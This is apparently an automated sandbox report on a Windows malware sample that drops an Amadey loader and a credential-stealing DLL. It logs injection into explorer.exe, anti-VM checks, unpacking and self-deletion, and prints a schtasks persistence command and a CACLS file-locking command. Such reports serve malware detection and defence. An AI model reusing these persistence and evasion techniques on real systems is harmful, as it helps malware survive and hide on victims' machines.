                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\afbc8f21a2e970df42df393e0a16fb7c
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: q4Z52wRd28.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\wide-ponicomonodido52\cepoh.pdb source: q4Z52wRd28.exe, cttgcew.1.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: A852.exe, A852.exe, 0000000C.00000002.423113351.0000000000400000.00000040.00000001.01000000.00000009.sdmp, A852.exe, 0000000C.00000003.416658958.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000003.432928807.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000002.773732313.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, rovwer.exe, 0000001A.00000002.578955706.0000000000400000.00000040.00000001.01000000.0000000B.sdmp
                      Source: Binary string: DC:\giroyid.pdb source: A852.exe, 0000000C.00000000.410237747.0000000000401000.00000020.00000001.01000000.00000009.sdmp, rovwer.exe, 0000000E.00000000.421565865.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000001A.00000000.445061282.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe.12.dr, A852.exe.1.dr
                      Source: Binary string: C:\cekezuca_v.pdb source: E35A.exe, 00000018.00000000.442927876.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, E35A.exe.1.dr
                      Source: Binary string: C:\zuc.pdb source: F771.exe, 00000020.00000000.454432318.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, F771.exe.1.dr
                      Source: Binary string: _.pdb source: F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\giroyid.pdb source: A852.exe, 0000000C.00000000.410237747.0000000000401000.00000020.00000001.01000000.00000009.sdmp, rovwer.exe, 0000000E.00000000.421565865.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000001A.00000000.445061282.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe.12.dr, A852.exe.1.dr
                      Source: Binary string: @C:\cekezuca_v.pdb source: E35A.exe, 00000018.00000000.442927876.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, E35A.exe.1.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeUnpacked PE file: 12.2.A852.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 14.2.rovwer.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeUnpacked PE file: 24.2.E35A.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 26.2.rovwer.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeUnpacked PE file: 32.2.F771.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeUnpacked PE file: 0.2.q4Z52wRd28.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\cttgcewUnpacked PE file: 11.2.cttgcew.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeUnpacked PE file: 12.2.A852.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 14.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeUnpacked PE file: 24.2.E35A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 26.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeUnpacked PE file: 32.2.F771.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_00401268 push cs; iretd
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_00402B84 push esp; iretd
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_00412E88 push es; retf
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00401268 push cs; iretd
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00402B84 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00412E88 push es; retf
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_008612CF push cs; iretd
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00861790 push 81396969h; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00410C48 push E8FFFFFBh; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00418C56 push ecx; ret
                      Source: CF35.exe.1.drStatic PE information: section name: _RDATA
                      Source: cred64[1].dll.14.drStatic PE information: real checksum: 0x0 should be: 0x26b56
                      Source: EB2B.exe.1.drStatic PE information: real checksum: 0xae41 should be: 0x5a5ca
                      Source: CF35.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x31822d
                      Source: cred64.dll.14.drStatic PE information: real checksum: 0x0 should be: 0x26b56
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.881559830047924

                      Persistence and Installation Behavior

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rovwer.exe PID: 4852, type: MEMORYSTR
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cttgcewJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B4A7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E35A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A852.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeFile created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cttgcewJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CF35.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EB2B.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F771.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: Yara matchFile source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49824
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\q4z52wrd28.exeJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\cttgcew:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeFile opened: C:\Users\user\AppData\Local\Temp\0.txt count: 74828
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\cttgcewKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\cttgcewKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\cttgcewKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\cttgcewKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\cttgcewKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\cttgcewKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\explorer.exe TID: 1332Thread sleep count: 650 > 30
                      Source: C:\Windows\explorer.exe TID: 1280Thread sleep count: 1292 > 30
                      Source: C:\Windows\explorer.exe TID: 1280Thread sleep time: -129200s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 2148Thread sleep count: 1201 > 30
                      Source: C:\Windows\explorer.exe TID: 2148Thread sleep time: -120100s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 1504Thread sleep count: 490 > 30
                      Source: C:\Windows\explorer.exe TID: 5984Thread sleep count: 1081 > 30
                      Source: C:\Windows\explorer.exe TID: 5984Thread sleep time: -108100s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 2888Thread sleep count: 1163 > 30
                      Source: C:\Windows\explorer.exe TID: 2888Thread sleep time: -116300s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 4884Thread sleep count: 34 > 30
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 4884Thread sleep time: -1020000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 2400Thread sleep time: -50000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 3272Thread sleep time: -540000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 5724Thread sleep time: -1080000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exe TID: 5388Thread sleep count: 40 > 30
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exe TID: 5388Thread sleep time: -40000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exe TID: 1652Thread sleep count: 106 > 30
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exe TID: 1652Thread sleep count: 284 > 30
                      Source: C:\Users\user\AppData\Local\Temp\F771.exe TID: 5244Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5684Thread sleep count: 96 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5684Thread sleep time: -96000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 5692Thread sleep count: 77 > 30
                      Source: C:\Windows\explorer.exe TID: 5692Thread sleep time: -77000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5852Thread sleep count: 92 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5852Thread sleep time: -92000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 5844Thread sleep count: 72 > 30
                      Source: C:\Windows\explorer.exe TID: 5844Thread sleep time: -72000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5092Thread sleep count: 1073 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5092Thread sleep time: -643800000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5092Thread sleep time: -600000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 244Thread sleep count: 129 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 244Thread sleep time: -129000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 3968Thread sleep count: 128 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 3968Thread sleep time: -128000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 4936Thread sleep count: 127 > 30
                      Source: C:\Windows\explorer.exe TID: 4936Thread sleep time: -127000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5236Thread sleep count: 125 > 30
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5236Thread sleep time: -125000s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 5344Thread sleep count: 44 > 30
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 360000
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 650
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1292
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1201
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 490
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1081
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1163
